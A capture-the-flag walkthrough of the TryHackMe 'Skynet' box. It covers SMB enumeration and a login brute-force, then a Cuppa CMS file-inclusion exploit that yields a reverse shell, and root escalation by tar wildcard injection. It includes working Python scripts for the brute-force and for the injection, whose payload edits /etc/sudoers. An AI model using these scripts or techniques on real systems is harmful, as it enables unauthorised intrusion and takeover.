Skynet
Reconnaissance
Initial nmap scan to find open ports, using the -Pn flag ("treat all hosts as alive", which skips host discovery in case the box drops ICMP probes).
Detailed Nmap Scan:
Command Breakdown:
(-sV): Service version detection
(-sC): Run the default nmap scripts
(-p): Scan only the ports found open in the first scan: 22, 80, 110, 139, 143, 445
(-oN nmap): Save the output in normal format to a file called nmap
Enumeration
Port 80: HTTP
Let's visit the website.
It is a search engine page, but searching for anything returns nothing and none of the buttons work. The page source has nothing interesting either.
Let's run a gobuster scan to find hidden directories and files.
It finds some directories, but we are not allowed to access any of them.
After a while we get another hit: a directory called /squirrelmail. Let's visit it and see whether we have access to it.
We do. It is a login form, so we need to find a username and a password.
Port 139,445: SMB
Let's use a tool called enum4linux, which enumerates information (users, shares, password policy and so on) from Samba/SMB services on a machine.
Looking at the output, in the Share Enumeration section, the share names print$ and IPC$ are standard on any Samba server, but anonymous and milesdyson are not. milesdyson looks like a username, so let's add it to our notes.
Now let's try to access those shares using smbclient. When prompted for a password, just hit Enter: this is a null session, i.e. anonymous access with an empty password.
We are logged in. Let's explore.
There is a directory and a file. Let's transfer the file to our machine, along with the files in the directory. I am only transferring the log1.txt file, because the other files in the directory are empty, as their size in the ls output shows.
Let's now read the files we transferred.
The attention.txt file tells us that all employees' passwords have been changed and that everyone is required to change their password. The second file looks like a password list, and its name, log, suggests it holds older passwords. So we can theorize that someone may not have changed their password yet, for example the person who wrote the attention note, Miles Dyson. We can try to brute-force the SquirrelMail login we found on the web server with the username milesdyson and the password list we just saw.
I wanted to use hydra or Burp Suite for this, but while looking at John Hammond's walkthrough I found the Python script he wrote very interesting and valuable, so I made my own and used it to find the correct password. Let's go through the steps he did.
First open the developer tools (Ctrl + Shift + I) and submit the login form with a random username and password. In the Network tab of the developer tools we see a request to redirect.php appear when we hit login; let's look at that request.
Now copy the request: right-click the request name, go to Copy and choose Copy as cURL. Paste that into a cURL-to-Python-requests converter and copy the resulting Python code into a file.
I'm going to create the file bruteforce.py. Once you have done that, we need to modify the code a bit so that it brute-forces the service with the username and password list we provide.
This is how the code looks before any modifications.
And this is the code after the modifications. I could try to explain what this code does, but John Hammond does a better job, so watch his video if you want to understand the code.
Now if we save and run the code, we find the password.
The password is cyborg007haloterminator, which is also the answer to the first question in this room.
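The following is an added example of the kind of script described above, written for this page; it is not the author's bruteforce.py nor John Hammond's script. It replays the captured redirect.php POST once per password from the list. Because the original post does not show the captured request, the form field names (login_username, secretkey), the redirect.php path and the "incorrect" error text used to detect a failed login are assumptions based on SquirrelMail's stock login form, and the base URL and user are placeholders. Only the Python standard library is used, so nothing needs installing.

```python
"""Added example (not the walkthrough's own script): brute-force a
SquirrelMail login with a username and a password list.

Assumptions (not shown on the page): the form posts to src/redirect.php
with fields login_username and secretkey, and a failed login renders a
page containing "Unknown user or password incorrect".
"""
import sys
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional

FAILURE_MARKER = "incorrect"  # substring of SquirrelMail's login error (assumption)


def looks_logged_in(body: str) -> bool:
    """True when the response body does not carry the login error text."""
    return FAILURE_MARKER not in body.lower()


def attempt_squirrelmail_login(base_url: str, username: str, password: str,
                               timeout: float = 5.0) -> bool:
    """Replay the captured login POST once and report whether it was accepted.

    base_url is the /squirrelmail directory gobuster found, e.g.
    http://10.10.10.10/squirrelmail (placeholder address)."""
    form = {
        "login_username": username,
        "secretkey": password,
        "js_autodetect_results": "1",
        "just_logged_in": "1",
    }
    req = urllib.request.Request(
        base_url.rstrip("/") + "/src/redirect.php",
        data=urllib.parse.urlencode(form).encode(),
        headers={"User-Agent": "Mozilla/5.0"},
        method="POST",
    )
    # A cookie jar keeps the session cookie across the redirect that follows a good login.
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
    with opener.open(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return looks_logged_in(body)


def brute_force(username: str, wordlist: Iterable[str],
                attempt: Callable[[str, str], bool]) -> Optional[str]:
    """Try each candidate from the word list in order; return the first one accepted.

    `attempt` is injected so the loop can be exercised without a live target."""
    for line in wordlist:
        candidate = line.rstrip("\r\n")
        if not candidate:  # skip blank lines in the leaked list
            continue
        if attempt(username, candidate):
            return candidate
    return None


if __name__ == "__main__":
    # usage: python3 bruteforce.py http://10.10.10.10/squirrelmail milesdyson log1.txt
    url, user, path = sys.argv[1:4]
    with open(path, encoding="utf-8", errors="replace") as fh:
        found = brute_force(user, fh, lambda u, p: attempt_squirrelmail_login(url, u, p))
    print(f"[+] {user}:{found}" if found else "[-] no password in the list matched")
```

The success check is deliberately a plain substring test on the error page rather than a status-code test, because SquirrelMail answers a bad login with a normal 200 page and a good one with a redirect; if your target's error wording differs, adjust FAILURE_MARKER after looking at one failed response in the Network tab.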
Port 80: HTTP
We can now log in to SquirrelMail.
There are three emails in Miles Dyson's inbox. The ones with (no subject) have nothing of interest, but the Samba Password reset email is really interesting.
We now have Miles Dyson's SMB password, which is )s{A&2Z=F^n_E.B'
Port 139,445: SMB
Now that we have Miles Dyson's SMB password, we can log in to the milesdyson share using smbclient.
We are now logged in. Let's list the files and directories in the share.
Looking through the files, only one file in the notes directory looks interesting, so let's transfer it to our machine.
Now let's read the important.txt file.
The first line gives us a directory we can visit on the web server, so let's do that.
Nothing of interest here, nor in the page source, so let's run gobuster against this directory to find hidden directories and files. (The directory we just found is also the answer to the second question in this room.)
We find an administrator page; let's visit it.
It is a login page. The credentials we found earlier do not work here. The page shows the name of the service, Cuppa CMS, so let's check searchsploit for any exploits we can use against it.
There is one, so let's copy the exploit into our working directory.
We can now answer the third question in this room.
Exploitation
Reading through the exploit, it looks like the vulnerable page will include an arbitrary file for us, so let's try reading /etc/passwd.
We need to replace the target and alerts placeholders in the example request as well.
It works. The exploit notes also say that we can make the server run PHP files this way: if we host a PHP file containing a command on an HTTP server on our machine and point the vulnerable parameter at its URL, the web server fetches and executes it, because the page is vulnerable to remote file inclusion as well as local file inclusion. (Remote includes only work when PHP's allow_url_include setting is enabled on the target, which is evidently the case here.)
So first let's make the file with the command; let's call it command.php.
Let's see whether the command whoami works.
Now we start an HTTP server on our machine so that the victim can fetch the file from us.
Then we run the curl command against the vulnerable URL, pointing it at command.php on our server.
It works: we get the right output. Now what if we replace command.php with a PHP reverse shell to get a shell on the machine? We can find a PHP reverse shell file here.
Copy the file, change the IP inside it to your TryHackMe VPN IP (as the comments in the file say), and place it in the directory where you start the HTTP server. Then update the file name in the curl URL and start a netcat listener on the port set in the PHP reverse shell file.
Make sure the Python HTTP server is still running, then run the curl command.
After you hit enter, you should get a reverse shell on the machine.
You can now read user.txt, which is the answer to the fourth question of this room.
You can use these commands to stabilize your shell.
Looking around the file system, a directory and a file stand out: /backups and the backup.sh script inside it.
Let's read the file.
It changes directory into /var/www/html and then runs a tar command that writes the archive into the /backups directory, using * as the list of files to archive. Looking at the tar command and at the * symbol, I thought there should be an exploit based on this, so I googled it and found the tar wildcard injection technique. The root cause is that the shell expands * into a list of file names before tar sees them, so a file whose name starts with -- is parsed by tar as an option, and tar's --checkpoint-action=exec option runs an arbitrary command.
The part that we are interested in is this.
I could try to explain what these commands do, but not as well as John Hammond, so make sure to look at his video for what the commands do and mean.
The commands we will use are the following (make sure to cd to /var/www/html before running them, since the file names must end up in the directory the script archives):
Wait a while for the backup script to run again, then run the sudo -l command.
Now we can run all commands as root, so let's switch to root.
You can also read the root flag, which is the answer to the last question of the room.
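The following is an added example written for this page, not commands from the original post, that reproduces the tar wildcard injection in a throw-away directory so the mechanism can be watched safely before using it on the box. It assumes, as the walkthrough implies, that the backup job runs cd /var/www/html followed by tar cf <archive> * as root on a schedule; the sudoers line is the payload the walkthrough's sudo -l step relies on, and the marker file name is an arbitrary choice for the demo. GNU tar is required, since --checkpoint-action is a GNU extension.

```python
"""Added example (not the walkthrough's own commands): tar wildcard injection
reproduced in a temporary directory.

sh expands an unquoted * into the file names in the directory, so a file named
--checkpoint=1 becomes a tar option, and --checkpoint-action=exec=... makes tar
run a command of our choosing. Assumes GNU tar and /bin/sh.
"""
import os
import shlex
import subprocess
import tempfile

# File names that tar parses as options once the shell glob expands them.
CHECKPOINT_FILES = ("--checkpoint=1", "--checkpoint-action=exec=sh shell.sh")

# The payload used on the box: give the web user full sudo rights. Not run by demo().
SUDOERS_PAYLOAD = '#!/bin/sh\necho "www-data ALL=(root) NOPASSWD: ALL" >> /etc/sudoers\n'


def plant(webroot: str, payload: str) -> list:
    """Write shell.sh and the two option-named files into webroot.

    Returns the sorted directory listing, i.e. what `*` will expand to."""
    with open(os.path.join(webroot, "shell.sh"), "w") as fh:
        fh.write(payload)
    for name in CHECKPOINT_FILES:
        open(os.path.join(webroot, name), "w").close()  # empty; only the name matters
    return sorted(os.listdir(webroot))


def run_backup_job(webroot: str) -> str:
    """Mimic backup.sh: archive everything in webroot with an unquoted wildcard.

    The glob is expanded by /bin/sh, not by tar, which is the whole bug."""
    archive = os.path.join(tempfile.mkdtemp(prefix="backups-"), "backup.tgz")
    subprocess.run(
        "tar cf " + shlex.quote(archive) + " *",
        shell=True, cwd=webroot, check=False,
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
    )
    return archive


def demo() -> bool:
    """Plant a harmless payload, run the job, and report whether tar executed it."""
    webroot = tempfile.mkdtemp(prefix="html-")
    marker = os.path.join(webroot, "executed.txt")  # arbitrary name for the demo
    payload = "#!/bin/sh\necho executed-by-tar > " + shlex.quote(marker) + "\n"
    plant(webroot, payload)
    run_backup_job(webroot)
    if not os.path.exists(marker):
        return False
    with open(marker) as fh:
        return fh.read().strip() == "executed-by-tar"


if __name__ == "__main__":
    print("tar ran shell.sh:", demo())
```

On the real box you would write SUDOERS_PAYLOAD into /var/www/html/shell.sh instead of the marker payload and let the scheduled job do the tar run; the fix on the defending side is to quote or avoid the wildcard (tar cf archive ./ or tar cf archive -- *), since tar cannot tell a file name from an option once the shell has expanded the glob.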